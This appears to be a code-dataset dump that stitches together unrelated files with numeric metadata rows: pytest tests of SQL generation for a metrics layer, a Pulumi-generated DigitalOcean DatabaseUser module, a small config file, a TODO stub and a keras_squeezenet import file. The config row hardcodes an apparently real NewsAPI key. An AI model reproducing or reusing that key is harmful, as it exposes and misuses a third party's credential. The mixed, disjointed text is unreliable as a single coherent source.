    whole join chain (orders -> discounts -> discount_detail -> country_detail,
    including the derived-table join and the extra DATE_TRUNC join condition),
    and the symmetric aggregate uses FARM_FINGERPRINT instead of MD5."""
    query = connection.get_sql_query(
        metrics=["avg_rainfall"],
        dimensions=["discount_promo_name"],
        query_type="BIGQUERY",
    )
    correct = (
        "SELECT discount_detail.promo_name as discount_detail_discount_promo_name,(COALESCE(CAST(("
        "SUM(DISTINCT (CAST(FLOOR(COALESCE(country_detail.rain, 0) * (1000000 * 1.0)) AS FLOAT64))"
        " + CAST(FARM_FINGERPRINT(CAST(country_detail.country AS STRING)) AS BIGNUMERIC)) - SUM(DISTINCT "
        "CAST(FARM_FINGERPRINT(CAST(country_detail.country AS STRING)) AS BIGNUMERIC))) AS FLOAT64) "
        "/ CAST((1000000*1.0) AS FLOAT64), 0) / NULLIF(COUNT(DISTINCT CASE WHEN "
        "(country_detail.rain) IS NOT NULL THEN country_detail.country ELSE NULL END), "
        "0)) as country_detail_avg_rainfall FROM analytics.order_line_items order_lines "
        "LEFT JOIN analytics.orders orders ON order_lines.order_unique_id=orders.id "
        "LEFT JOIN analytics_live.discounts discounts ON orders.id=discounts.order_id "
        "LEFT JOIN analytics.discount_detail discount_detail "
        "ON discounts.discount_id=discount_detail.discount_id "
        "AND DATE_TRUNC(discounts.order_date, WEEK) is not null "
        "LEFT JOIN (SELECT * FROM ANALYTICS.COUNTRY_DETAIL) as country_detail "
        "ON discounts.country=country_detail.country GROUP BY discount_detail.promo_name;"
    )
    assert query == correct
def test_query_single_join_select_args(connection):
    """Raw select_raw_sql snippets are appended verbatim to SELECT and GROUP BY."""
    raw_group = "CAST(new_vs_repeat = 'Repeat' AS INT) as group_1"
    raw_period = "CAST(date_created > '2021-04-02' AS INT) as period"
    generated = connection.get_sql_query(
        metrics=["total_item_revenue"],
        dimensions=["channel", "new_vs_repeat"],
        select_raw_sql=[raw_group, raw_period],
    )
    expected = (
        "SELECT order_lines.sales_channel as order_lines_channel,"
        "orders.new_vs_repeat as orders_new_vs_repeat,"
        "SUM(order_lines.revenue) as order_lines_total_item_revenue,"
        "CAST(new_vs_repeat = 'Repeat' AS INT) as group_1,"
        "CAST(date_created > '2021-04-02' AS INT) as period FROM "
        "analytics.order_line_items order_lines LEFT JOIN analytics.orders orders ON "
        "order_lines.order_unique_id=orders.id GROUP BY order_lines.sales_channel,orders.new_vs_repeat,"
        "CAST(new_vs_repeat = 'Repeat' AS INT),CAST(date_created > '2021-04-02' AS INT);"
    )
    assert generated == expected
def test_query_single_join_with_case_raw_sql(connection):
    """A raw-SQL CASE dimension is expanded in both SELECT and GROUP BY."""
    expected = (
        "SELECT CASE WHEN order_lines.product_name ilike '%sale%' then TRUE else FALSE end "
        "as order_lines_is_on_sale_sql,orders.new_vs_repeat as orders_new_vs_repeat,"
        "SUM(order_lines.revenue) as order_lines_total_item_revenue FROM "
        "analytics.order_line_items order_lines LEFT JOIN analytics.orders orders "
        "ON order_lines.order_unique_id=orders.id GROUP BY CASE WHEN order_lines.product_name "
        "ilike '%sale%' then TRUE else FALSE end,orders.new_vs_repeat;"
    )
    generated = connection.get_sql_query(
        metrics=["total_item_revenue"],
        dimensions=["is_on_sale_sql", "new_vs_repeat"],
    )
    assert generated == expected
def test_query_single_join_with_case(connection):
    """A case-type dimension expands to the full CASE expression in SELECT and GROUP BY."""
    expected = (
        "SELECT case when order_lines.product_name ilike '%sale%' then 'On sale' else 'Not on sale' end "  # noqa
        "as order_lines_is_on_sale_case,orders.new_vs_repeat as orders_new_vs_repeat,"
        "SUM(order_lines.revenue) as order_lines_total_item_revenue FROM "
        "analytics.order_line_items order_lines LEFT JOIN analytics.orders orders "
        "ON order_lines.order_unique_id=orders.id GROUP BY case when order_lines.product_name "
        "ilike '%sale%' then 'On sale' else 'Not on sale' end,orders.new_vs_repeat;"
    )
    generated = connection.get_sql_query(
        metrics=["total_item_revenue"],
        dimensions=["is_on_sale_case", "new_vs_repeat"],
    )
    assert generated == expected
def test_query_single_join_with_tier(connection):
    """A tier dimension should expand to its bucketing CASE expression in SELECT and GROUP BY."""
    tier_sql = (
        "case when order_lines.revenue < 0 then 'Below 0' when order_lines.revenue >= 0 "
        "and order_lines.revenue < 20 then '[0,20)' when order_lines.revenue >= 20 and "
        "order_lines.revenue < 50 then '[20,50)' when order_lines.revenue >= 50 and "
        "order_lines.revenue < 100 then '[50,100)' when order_lines.revenue >= 100 and "
        "order_lines.revenue < 300 then '[100,300)' when order_lines.revenue >= 300 "
        "then '[300,inf)' else 'Unknown' end"
    )
    expected = (
        f"SELECT {tier_sql} as order_lines_order_tier,orders.new_vs_repeat as orders_new_vs_repeat,"
        "SUM(order_lines.revenue) as order_lines_total_item_revenue FROM "
        "analytics.order_line_items order_lines LEFT JOIN analytics.orders orders "
        f"ON order_lines.order_unique_id=orders.id GROUP BY {tier_sql},orders.new_vs_repeat;"
    )
    generated = connection.get_sql_query(
        metrics=["total_item_revenue"],
        dimensions=["order_tier", "new_vs_repeat"],
    )
    assert generated == expected
def test_query_single_join_with_filter(connection):
    """A filtered metric should render as a COUNT over a CASE guard."""
    expected = "".join(
        (
            "SELECT order_lines.sales_channel as order_lines_channel,",
            "orders.new_vs_repeat as orders_new_vs_repeat,",
            "COUNT(case when order_lines.sales_channel = 'Email' then order_lines.order_id end) ",
            "as order_lines_number_of_email_purchased_items FROM analytics.order_line_items ",
            "order_lines LEFT JOIN analytics.orders orders ON order_lines.order_unique_id=orders.id",
            " GROUP BY order_lines.sales_channel,orders.new_vs_repeat;",
        )
    )
    generated = connection.get_sql_query(
        metrics=["number_of_email_purchased_items"],
        dimensions=["channel", "new_vs_repeat"],
    )
    assert generated == expected
def test_query_multiple_join(connection):
    """Dimensions spanning two joined views should produce two LEFT JOINs."""
    expected = "".join(
        (
            "SELECT customers.region as customers_region,orders.new_vs_repeat as orders_new_vs_repeat,",
            "SUM(order_lines.revenue) as order_lines_total_item_revenue FROM ",
            "analytics.order_line_items order_lines ",
            "LEFT JOIN analytics.orders orders ON order_lines.order_unique_id=orders.id ",
            "LEFT JOIN analytics.customers customers ON order_lines.customer_id=customers.customer_id ",
            "GROUP BY customers.region,orders.new_vs_repeat;",
        )
    )
    generated = connection.get_sql_query(
        metrics=["total_item_revenue"],
        dimensions=["region", "new_vs_repeat"],
    )
    assert generated == expected
def test_query_multiple_join_where_dict(connection):
    """A dict-style where filter should render as a WHERE clause before GROUP BY."""
    expected = "".join(
        (
            "SELECT customers.region as customers_region,orders.new_vs_repeat as orders_new_vs_repeat,",
            "SUM(order_lines.revenue) as order_lines_total_item_revenue FROM ",
            "analytics.order_line_items order_lines ",
            "LEFT JOIN analytics.orders orders ON order_lines.order_unique_id=orders.id ",
            "LEFT JOIN analytics.customers customers ON order_lines.customer_id=customers.customer_id ",
            "WHERE customers.region<>'West' ",
            "GROUP BY customers.region,orders.new_vs_repeat;",
        )
    )
    generated = connection.get_sql_query(
        metrics=["total_item_revenue"],
        dimensions=["region", "new_vs_repeat"],
        where=[{"field": "region", "expression": "not_equal_to", "value": "West"}],
    )
    assert generated == expected
def test_query_multiple_join_where_literal(connection):
    """A literal where string should have its field reference resolved to real SQL."""
    expected = "".join(
        (
            "SELECT customers.region as customers_region,orders.new_vs_repeat as orders_new_vs_repeat,",
            "SUM(order_lines.revenue) as order_lines_total_item_revenue FROM ",
            "analytics.order_line_items order_lines ",
            "LEFT JOIN analytics.orders orders ON order_lines.order_unique_id=orders.id ",
            "LEFT JOIN analytics.customers customers ON order_lines.customer_id=customers.customer_id ",
            "WHERE DATE_TRUNC('WEEK', customers.first_order_date) > '2021-07-12' ",
            "GROUP BY customers.region,orders.new_vs_repeat;",
        )
    )
    generated = connection.get_sql_query(
        metrics=["total_item_revenue"],
        dimensions=["region", "new_vs_repeat"],
        where="first_order_week > '2021-07-12'",
    )
    assert generated == expected
def test_query_multiple_join_having_dict(connection):
    """A dict-style having filter should render as HAVING on the aggregate."""
    expected = "".join(
        (
            "SELECT customers.region as customers_region,orders.new_vs_repeat as orders_new_vs_repeat,",
            "SUM(order_lines.revenue) as order_lines_total_item_revenue FROM ",
            "analytics.order_line_items order_lines ",
            "LEFT JOIN analytics.orders orders ON order_lines.order_unique_id=orders.id ",
            "LEFT JOIN analytics.customers customers ON order_lines.customer_id=customers.customer_id ",
            "GROUP BY customers.region,orders.new_vs_repeat HAVING SUM(order_lines.revenue)>-12;",
        )
    )
    generated = connection.get_sql_query(
        metrics=["total_item_revenue"],
        dimensions=["region", "new_vs_repeat"],
        having=[{"field": "total_item_revenue", "expression": "greater_than", "value": -12}],
    )
    assert generated == expected
def test_query_multiple_join_having_literal(connection):
    """A literal having string should resolve the metric name inside HAVING."""
    expected = "".join(
        (
            "SELECT customers.region as customers_region,orders.new_vs_repeat as orders_new_vs_repeat,",
            "SUM(order_lines.revenue) as order_lines_total_item_revenue FROM ",
            "analytics.order_line_items order_lines ",
            "LEFT JOIN analytics.orders orders ON order_lines.order_unique_id=orders.id ",
            "LEFT JOIN analytics.customers customers ON order_lines.customer_id=customers.customer_id ",
            "GROUP BY customers.region,orders.new_vs_repeat HAVING SUM(order_lines.revenue) > -12;",
        )
    )
    generated = connection.get_sql_query(
        metrics=["total_item_revenue"],
        dimensions=["region", "new_vs_repeat"],
        having="total_item_revenue > -12",
    )
    assert generated == expected
def test_query_multiple_join_order_by_literal(connection):
    """A literal order_by should default to ascending sort."""
    expected = "".join(
        (
            "SELECT customers.region as customers_region,orders.new_vs_repeat as orders_new_vs_repeat,",
            "SUM(order_lines.revenue) as order_lines_total_item_revenue FROM ",
            "analytics.order_line_items order_lines ",
            "LEFT JOIN analytics.orders orders ON order_lines.order_unique_id=orders.id ",
            "LEFT JOIN analytics.customers customers ON order_lines.customer_id=customers.customer_id ",
            "GROUP BY customers.region,orders.new_vs_repeat ORDER BY total_item_revenue ASC;",
        )
    )
    generated = connection.get_sql_query(
        metrics=["total_item_revenue"],
        dimensions=["region", "new_vs_repeat"],
        order_by="total_item_revenue",
    )
    assert generated == expected
def test_query_multiple_join_all(connection):
    """where + having + order_by together should all land in the generated SQL."""
    expected = "".join(
        (
            "SELECT customers.region as customers_region,orders.new_vs_repeat as orders_new_vs_repeat,",
            "SUM(order_lines.revenue) as order_lines_total_item_revenue FROM ",
            "analytics.order_line_items order_lines ",
            "LEFT JOIN analytics.orders orders ON order_lines.order_unique_id=orders.id ",
            "LEFT JOIN analytics.customers customers ON order_lines.customer_id=customers.customer_id ",
            "WHERE customers.region<>'West' ",
            "GROUP BY customers.region,orders.new_vs_repeat HAVING SUM(order_lines.revenue)>-12 ",
            "ORDER BY total_item_revenue DESC;",
        )
    )
    generated = connection.get_sql_query(
        metrics=["total_item_revenue"],
        dimensions=["region", "new_vs_repeat"],
        where=[{"field": "region", "expression": "not_equal_to", "value": "West"}],
        having=[{"field": "total_item_revenue", "expression": "greater_than", "value": -12}],
        order_by=[{"field": "total_item_revenue", "sort": "desc"}],
    )
    assert generated == expected
| 45.735849
| 119
| 0.71514
| 2,599
| 19,392
| 5.00077
| 0.064255
| 0.116181
| 0.05332
| 0.05886
| 0.869508
| 0.834346
| 0.824575
| 0.790336
| 0.755636
| 0.715858
| 0
| 0.015894
| 0.182395
| 19,392
| 423
| 120
| 45.843972
| 0.803847
| 0.000928
| 0
| 0.471471
| 0
| 0.039039
| 0.637654
| 0.325848
| 0
| 0
| 0
| 0
| 0.075075
| 1
| 0.075075
| false
| 0
| 0
| 0
| 0.075075
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f3fdf8be5b27cafeba639c3a598acacbe20c6383
| 14,894
|
py
|
Python
|
sdk/python/pulumi_digitalocean/database_user.py
|
yitsushi/pulumi-digitalocean
|
9d408e7e4a3bed2d9e7aa91a32e2f154706a3400
|
[
"ECL-2.0",
"Apache-2.0"
] | 53
|
2019-04-25T14:43:12.000Z
|
2022-03-14T15:51:44.000Z
|
sdk/python/pulumi_digitalocean/database_user.py
|
yitsushi/pulumi-digitalocean
|
9d408e7e4a3bed2d9e7aa91a32e2f154706a3400
|
[
"ECL-2.0",
"Apache-2.0"
] | 158
|
2019-04-15T21:47:18.000Z
|
2022-03-29T21:21:57.000Z
|
sdk/python/pulumi_digitalocean/database_user.py
|
yitsushi/pulumi-digitalocean
|
9d408e7e4a3bed2d9e7aa91a32e2f154706a3400
|
[
"ECL-2.0",
"Apache-2.0"
] | 10
|
2019-04-15T20:16:11.000Z
|
2021-05-28T19:08:32.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['DatabaseUserArgs', 'DatabaseUser']
@pulumi.input_type
class DatabaseUserArgs:
    # Input-argument bag consumed by DatabaseUser.__init__. Generated by the
    # Pulumi Terraform Bridge (tfgen): values are stored and read through
    # pulumi.set/pulumi.get rather than plain attribute access.
    def __init__(__self__, *,
                 cluster_id: pulumi.Input[str],
                 mysql_auth_plugin: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None):
        """
        The set of arguments for constructing a DatabaseUser resource.

        :param pulumi.Input[str] cluster_id: The ID of the original source database cluster.
        :param pulumi.Input[str] mysql_auth_plugin: The authentication method to use for connections to the MySQL user account. The valid values are `mysql_native_password` or `caching_sha2_password` (this is the default).
        :param pulumi.Input[str] name: The name for the database user.
        """
        pulumi.set(__self__, "cluster_id", cluster_id)
        # Optional inputs are recorded only when explicitly provided so the
        # engine can distinguish "unset" from an explicit value.
        if mysql_auth_plugin is not None:
            pulumi.set(__self__, "mysql_auth_plugin", mysql_auth_plugin)
        if name is not None:
            pulumi.set(__self__, "name", name)

    @property
    @pulumi.getter(name="clusterId")
    def cluster_id(self) -> pulumi.Input[str]:
        """
        The ID of the original source database cluster.
        """
        return pulumi.get(self, "cluster_id")

    @cluster_id.setter
    def cluster_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "cluster_id", value)

    @property
    @pulumi.getter(name="mysqlAuthPlugin")
    def mysql_auth_plugin(self) -> Optional[pulumi.Input[str]]:
        """
        The authentication method to use for connections to the MySQL user account. The valid values are `mysql_native_password` or `caching_sha2_password` (this is the default).
        """
        return pulumi.get(self, "mysql_auth_plugin")

    @mysql_auth_plugin.setter
    def mysql_auth_plugin(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "mysql_auth_plugin", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        The name for the database user.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)
@pulumi.input_type
class _DatabaseUserState:
    # Full provider-side state of a DatabaseUser, used by DatabaseUser.get()
    # lookups. Unlike DatabaseUserArgs it also carries the output-only
    # `password` and `role` properties. Generated by tfgen.
    def __init__(__self__, *,
                 cluster_id: Optional[pulumi.Input[str]] = None,
                 mysql_auth_plugin: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 password: Optional[pulumi.Input[str]] = None,
                 role: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering DatabaseUser resources.

        :param pulumi.Input[str] cluster_id: The ID of the original source database cluster.
        :param pulumi.Input[str] mysql_auth_plugin: The authentication method to use for connections to the MySQL user account. The valid values are `mysql_native_password` or `caching_sha2_password` (this is the default).
        :param pulumi.Input[str] name: The name for the database user.
        :param pulumi.Input[str] password: Password for the database user.
        :param pulumi.Input[str] role: Role for the database user. The value will be either "primary" or "normal".
        """
        # Every property is optional here; only supplied ones are recorded.
        if cluster_id is not None:
            pulumi.set(__self__, "cluster_id", cluster_id)
        if mysql_auth_plugin is not None:
            pulumi.set(__self__, "mysql_auth_plugin", mysql_auth_plugin)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if password is not None:
            pulumi.set(__self__, "password", password)
        if role is not None:
            pulumi.set(__self__, "role", role)

    @property
    @pulumi.getter(name="clusterId")
    def cluster_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the original source database cluster.
        """
        return pulumi.get(self, "cluster_id")

    @cluster_id.setter
    def cluster_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "cluster_id", value)

    @property
    @pulumi.getter(name="mysqlAuthPlugin")
    def mysql_auth_plugin(self) -> Optional[pulumi.Input[str]]:
        """
        The authentication method to use for connections to the MySQL user account. The valid values are `mysql_native_password` or `caching_sha2_password` (this is the default).
        """
        return pulumi.get(self, "mysql_auth_plugin")

    @mysql_auth_plugin.setter
    def mysql_auth_plugin(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "mysql_auth_plugin", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        The name for the database user.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def password(self) -> Optional[pulumi.Input[str]]:
        """
        Password for the database user.
        """
        return pulumi.get(self, "password")

    @password.setter
    def password(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "password", value)

    @property
    @pulumi.getter
    def role(self) -> Optional[pulumi.Input[str]]:
        """
        Role for the database user. The value will be either "primary" or "normal".
        """
        return pulumi.get(self, "role")

    @role.setter
    def role(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "role", value)
class DatabaseUser(pulumi.CustomResource):
    # Pulumi resource wrapper generated by tfgen. The two @overload __init__
    # signatures exist only for type checkers; the real __init__ dispatches
    # to _internal_init based on which form the caller used.
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 cluster_id: Optional[pulumi.Input[str]] = None,
                 mysql_auth_plugin: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """
        Provides a DigitalOcean database user resource. When creating a new database cluster, a default admin user with name `doadmin` will be created. Then, this resource can be used to provide additional normal users inside the cluster.

        > **NOTE:** Any new users created will always have `normal` role, only the default user that comes with database cluster creation has `primary` role. Additional permissions must be managed manually.

        ## Example Usage
        ### Create a new PostgreSQL database user

        ```python
        import pulumi
        import pulumi_digitalocean as digitalocean

        postgres_example = digitalocean.DatabaseCluster("postgres-example",
            engine="pg",
            version="11",
            size="db-s-1vcpu-1gb",
            region="nyc1",
            node_count=1)
        user_example = digitalocean.DatabaseUser("user-example", cluster_id=postgres_example.id)
        ```

        ## Import

        Database user can be imported using the `id` of the source database cluster and the `name` of the user joined with a comma. For example

        ```sh
        $ pulumi import digitalocean:index/databaseUser:DatabaseUser user-example 245bcfd0-7f31-4ce6-a2bc-475a116cca97,foobar
        ```

        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] cluster_id: The ID of the original source database cluster.
        :param pulumi.Input[str] mysql_auth_plugin: The authentication method to use for connections to the MySQL user account. The valid values are `mysql_native_password` or `caching_sha2_password` (this is the default).
        :param pulumi.Input[str] name: The name for the database user.
        """
        ...
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: DatabaseUserArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Provides a DigitalOcean database user resource. When creating a new database cluster, a default admin user with name `doadmin` will be created. Then, this resource can be used to provide additional normal users inside the cluster.

        > **NOTE:** Any new users created will always have `normal` role, only the default user that comes with database cluster creation has `primary` role. Additional permissions must be managed manually.

        ## Example Usage
        ### Create a new PostgreSQL database user

        ```python
        import pulumi
        import pulumi_digitalocean as digitalocean

        postgres_example = digitalocean.DatabaseCluster("postgres-example",
            engine="pg",
            version="11",
            size="db-s-1vcpu-1gb",
            region="nyc1",
            node_count=1)
        user_example = digitalocean.DatabaseUser("user-example", cluster_id=postgres_example.id)
        ```

        ## Import

        Database user can be imported using the `id` of the source database cluster and the `name` of the user joined with a comma. For example

        ```sh
        $ pulumi import digitalocean:index/databaseUser:DatabaseUser user-example 245bcfd0-7f31-4ce6-a2bc-475a116cca97,foobar
        ```

        :param str resource_name: The name of the resource.
        :param DatabaseUserArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...
    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Runtime dispatcher between the two overloads above: if the caller
        # passed a DatabaseUserArgs bag, unpack it into keyword arguments.
        resource_args, opts = _utilities.get_resource_args_opts(DatabaseUserArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)

    def _internal_init(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 cluster_id: Optional[pulumi.Input[str]] = None,
                 mysql_auth_plugin: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        # Shared implementation behind both __init__ overloads.
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            # Creating a new resource (no provider id given); __props__ is
            # reserved for the get() lookup path.
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = DatabaseUserArgs.__new__(DatabaseUserArgs)

            if cluster_id is None and not opts.urn:
                raise TypeError("Missing required property 'cluster_id'")
            __props__.__dict__["cluster_id"] = cluster_id
            __props__.__dict__["mysql_auth_plugin"] = mysql_auth_plugin
            __props__.__dict__["name"] = name
            # Output-only properties start as None; the provider fills them in.
            __props__.__dict__["password"] = None
            __props__.__dict__["role"] = None
        super(DatabaseUser, __self__).__init__(
            'digitalocean:index/databaseUser:DatabaseUser',
            resource_name,
            __props__,
            opts)

    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            cluster_id: Optional[pulumi.Input[str]] = None,
            mysql_auth_plugin: Optional[pulumi.Input[str]] = None,
            name: Optional[pulumi.Input[str]] = None,
            password: Optional[pulumi.Input[str]] = None,
            role: Optional[pulumi.Input[str]] = None) -> 'DatabaseUser':
        """
        Get an existing DatabaseUser resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.

        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] cluster_id: The ID of the original source database cluster.
        :param pulumi.Input[str] mysql_auth_plugin: The authentication method to use for connections to the MySQL user account. The valid values are `mysql_native_password` or `caching_sha2_password` (this is the default).
        :param pulumi.Input[str] name: The name for the database user.
        :param pulumi.Input[str] password: Password for the database user.
        :param pulumi.Input[str] role: Role for the database user. The value will be either "primary" or "normal".
        """
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))

        __props__ = _DatabaseUserState.__new__(_DatabaseUserState)

        __props__.__dict__["cluster_id"] = cluster_id
        __props__.__dict__["mysql_auth_plugin"] = mysql_auth_plugin
        __props__.__dict__["name"] = name
        __props__.__dict__["password"] = password
        __props__.__dict__["role"] = role
        return DatabaseUser(resource_name, opts=opts, __props__=__props__)

    @property
    @pulumi.getter(name="clusterId")
    def cluster_id(self) -> pulumi.Output[str]:
        """
        The ID of the original source database cluster.
        """
        return pulumi.get(self, "cluster_id")

    @property
    @pulumi.getter(name="mysqlAuthPlugin")
    def mysql_auth_plugin(self) -> pulumi.Output[Optional[str]]:
        """
        The authentication method to use for connections to the MySQL user account. The valid values are `mysql_native_password` or `caching_sha2_password` (this is the default).
        """
        return pulumi.get(self, "mysql_auth_plugin")

    @property
    @pulumi.getter
    def name(self) -> pulumi.Output[str]:
        """
        The name for the database user.
        """
        return pulumi.get(self, "name")

    @property
    @pulumi.getter
    def password(self) -> pulumi.Output[str]:
        """
        Password for the database user.
        """
        return pulumi.get(self, "password")

    @property
    @pulumi.getter
    def role(self) -> pulumi.Output[str]:
        """
        Role for the database user. The value will be either "primary" or "normal".
        """
        return pulumi.get(self, "role")
| 42.676218
| 238
| 0.647442
| 1,795
| 14,894
| 5.154318
| 0.113092
| 0.065391
| 0.080199
| 0.076092
| 0.801016
| 0.776048
| 0.750324
| 0.741786
| 0.736273
| 0.720601
| 0
| 0.005055
| 0.256143
| 14,894
| 348
| 239
| 42.798851
| 0.830039
| 0.398818
| 0
| 0.603352
| 1
| 0
| 0.0874
| 0.005478
| 0
| 0
| 0
| 0
| 0
| 1
| 0.156425
| false
| 0.078212
| 0.027933
| 0
| 0.27933
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
edaa11d57bfaf094ff23baa1f233866f428abf23
| 48
|
py
|
Python
|
static/news_ETL/config.py
|
DutchDS/Project-2
|
ca9378ac797b8e29b655453f95553f54858b7bb8
|
[
"MIT"
] | null | null | null |
static/news_ETL/config.py
|
DutchDS/Project-2
|
ca9378ac797b8e29b655453f95553f54858b7bb8
|
[
"MIT"
] | 4
|
2020-02-25T02:49:55.000Z
|
2020-02-29T19:43:35.000Z
|
static/news_ETL/config.py
|
DutchDS/Project-2
|
ca9378ac797b8e29b655453f95553f54858b7bb8
|
[
"MIT"
] | 1
|
2020-06-06T02:02:22.000Z
|
2020-06-06T02:02:22.000Z
|
import os

# News API credential for the ETL scripts in this package.
#
# NOTE(review): this key was previously committed in plain text, which is a
# credential leak — it should be rotated. The environment variable
# NEWSAPI_KEY now takes precedence; the old literal is kept only as a
# backward-compatible fallback so existing setups keep working.
newsapi_key = os.environ.get('NEWSAPI_KEY', '17189260d63f458ca3a7b53161be8b0a')
| 48
| 48
| 0.895833
| 3
| 48
| 14
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.478261
| 0.041667
| 48
| 1
| 48
| 48
| 0.434783
| 0
| 0
| 0
| 0
| 0
| 0.653061
| 0.653061
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
edd7304526d3db19ec9bc2c17540c5223a16d11f
| 47
|
py
|
Python
|
at_learner_core/at_learner_core/models/model.py
|
hieuvecto/CASIA-SURF_CeFA
|
71dfd846ce968b3ed26974392a6e0c9b40aa12ae
|
[
"MIT"
] | 133
|
2020-03-03T03:58:04.000Z
|
2022-03-28T21:42:36.000Z
|
at_learner_core/at_learner_core/models/model.py
|
lucaslu1987/CASIA-SURF_CeFA
|
205d3d976523ed0c15d1e709ed7f21d50d7cf19b
|
[
"MIT"
] | 24
|
2020-03-13T09:30:09.000Z
|
2022-03-22T07:47:15.000Z
|
at_learner_core/at_learner_core/models/model.py
|
lucaslu1987/CASIA-SURF_CeFA
|
205d3d976523ed0c15d1e709ed7f21d50d7cf19b
|
[
"MIT"
] | 29
|
2020-03-10T06:46:45.000Z
|
2022-01-29T15:35:21.000Z
|
'''
TODO:
def get_wrapper
def get_optimizer
'''
| 9.4
| 17
| 0.723404
| 7
| 47
| 4.571429
| 0.714286
| 0.375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12766
| 47
| 5
| 18
| 9.4
| 0.780488
| 0.829787
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0.2
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
edee871f34d10808eb554478e4bd88d16fa0762b
| 100
|
py
|
Python
|
keras_squeezenet/__init__.py
|
zr71516/squeezeNet
|
e54c681ea573092d54557fe09c9d492fcd0cfa2c
|
[
"MIT"
] | 430
|
2016-11-09T03:36:23.000Z
|
2022-03-19T09:56:35.000Z
|
keras_squeezenet/__init__.py
|
zr71516/squeezeNet
|
e54c681ea573092d54557fe09c9d492fcd0cfa2c
|
[
"MIT"
] | 21
|
2016-11-14T00:57:27.000Z
|
2021-03-19T22:43:05.000Z
|
keras_squeezenet/__init__.py
|
zr71516/squeezeNet
|
e54c681ea573092d54557fe09c9d492fcd0cfa2c
|
[
"MIT"
] | 184
|
2016-10-30T12:51:55.000Z
|
2022-02-20T15:19:28.000Z
|
from keras_squeezenet.squeezenet import SqueezeNet
from keras_squeezenet.version import __version__
| 33.333333
| 50
| 0.9
| 12
| 100
| 7
| 0.416667
| 0.214286
| 0.452381
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
